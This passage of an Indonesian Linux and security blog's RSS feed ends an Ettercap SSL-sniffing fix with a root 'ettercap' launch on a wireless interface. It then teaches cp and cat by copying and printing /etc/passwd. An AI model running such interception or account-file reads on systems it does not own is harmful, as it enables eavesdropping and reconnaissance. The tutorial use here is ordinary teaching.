&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; # nobody is the default&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Tekan ctrl+x , kemudian tekan y untuk menyimpan. Dan enter untuk menkonfirmasi.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Jalankan kembali ettercap dengan perintah.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# ettercap -T -q -i wlan0&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-_CdKJCRfEDQ/TzC77yMFVCI/AAAAAAAABNA/aNuWdjzkIak/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="http://3.bp.blogspot.com/-_CdKJCRfEDQ/TzC77yMFVCI/AAAAAAAABNA/aNuWdjzkIak/s320/5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perfect as usual =)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;created by : &lt;span class="Apple-style-span" style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-8556270015772624217?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/02/fix-ettercap-ssl-dissection-needs-valid.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-Kx73N1k56Gs/TzC6aeroteI/AAAAAAAABM4/ioUJT6lf1VM/s72-c/1.png' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-72196900716035625</guid><pubDate>Thu, 02 Feb 2012 03:37:00 +0000</pubDate><atom:updated>2012-02-02T10:37:13.312+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>bash command</category><category domain='http://www.blogger.com/atom/ns#'>Tutorial</category><category domain='http://www.blogger.com/atom/ns#'>cat</category><category domain='http://www.blogger.com/atom/ns#'>awk</category><category domain='http://www.blogger.com/atom/ns#'>linux</category><category domain='http://www.blogger.com/atom/ns#'>cp</category><category domain='http://www.blogger.com/atom/ns#'>CLI</category><category domain='http://www.blogger.com/atom/ns#'>tee</category><category domain='http://www.blogger.com/atom/ns#'>sort</category><title>Do More With CLI [Part 2]</title><description>Masih mau belajar perintah linux? Bagus. Ini supaya kalian ngga manja dengan kursor, alias GUI. Sebelumnya saya sudah memberikan tutorial CLI&amp;nbsp;&lt;a href="http://www.root-bt.co.cc/2012/01/do-more-with-cli-part-1.html" target="_blank"&gt;part 1&lt;/a&gt;. Sekarang giliran part 2.&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dalam kesempatan kali ini, saya akan mengajarkan perintah cp, cat, awk, sort, dan tee. Jangan langsung putus asa, ini sangat mudah, dan menyenangkan. Terlebih ketika anda menguasai hal ini dengan sangat baik.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ok, langsung saja ke tutorial.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Preparation:&lt;/div&gt;&lt;div&gt;[*] Terminal &lt;i&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;terletak pada Applications - Accessories - Terminal&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Walkthrough:&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;1. Buka terminal anda. Kemudian berpindahlah menuju directory /tmp&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# cd /tmp&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&lt;span class="Apple-style-span" style="color: black; font-size: small;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/tmp&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mengapa kita berpindah ke directory /tmp? Tutorial kali ini, akan membuat beberapa file. Directory /tmp dirancang untuk membersihkan seluruh isinya setelah linux di-restart. Jadi file file ini akan hilang setelah linux di-restart. Yaaa, hitung-hitung kalian tidak perlu menghapus file ini, jika file ini tidak terpakai. =)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;2. Perintah cp&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;CP adalah perintah copy, penggunaannya sangat sederhana.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# cp &amp;lt;file yang hendak di copy&amp;gt; [nama file setelah dicopy]&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Contoh:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/tmp&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# cp /etc/passwd passwd&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-7MwiuWQ3xZg/TyoECMgwglI/AAAAAAAABL0/rgK2g8KLb3o/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="http://4.bp.blogspot.com/-7MwiuWQ3xZg/TyoECMgwglI/AAAAAAAABL0/rgK2g8KLb3o/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;i&gt;&lt;span class="Apple-style-span" style="color: cyan;"&gt;menggunakan perintah cp&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kali ini saya akan meng-copy file passwd yang terletak di directory /etc. Kemudian menyimpannya dengan nama passwd.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;3. Perintah cat&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;CAT adalah perintah untuk menampilkan isi dari sebuah file. Kurang lebih mencetak file tersebut. Ini sama seperti perintah print dalam command prompt. Penggunaan perintah cat juga sangat sederhana.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# cat &amp;lt;file yang hendak di cetak&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Contoh:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: white; font-size: 13px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;#&lt;/span&gt;&lt;/span&gt;&amp;nbsp;cat passwd&amp;nbsp;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;root:x:0:0:root:/root:/bin/bash&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;daemon:x:1:1:daemon:/usr/sbin:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;bin:x:2:2:bin:/bin:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;sys:x:3:3:sys:/dev:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;sync:x:4:65534:sync:/bin:/bin/sync&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;games:x:5:60:games:/usr/games:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;man:x:6:12:man:/var/cache/man:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;lp:x:7:7:lp:/var/spool/lpd:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;mail:x:8:8:mail:/var/mail:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;news:x:9:9:news:/var/spool/news:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;proxy:x:13:13:proxy:/bin:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www-data:x:33:33:www-data:/var/www:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;backup:x:34:34:backup:/var/backups:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;list:x:38:38:Mailing List Manager:/var/list:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;irc:x:39:39:ircd:/var/run/ircd:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;libuuid:x:100:101::/var/lib/libuuid:/bin/sh&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;syslog:x:101:103::/home/syslog:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;landscape:x:103:108::/var/lib/landscape:/bin/false&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; 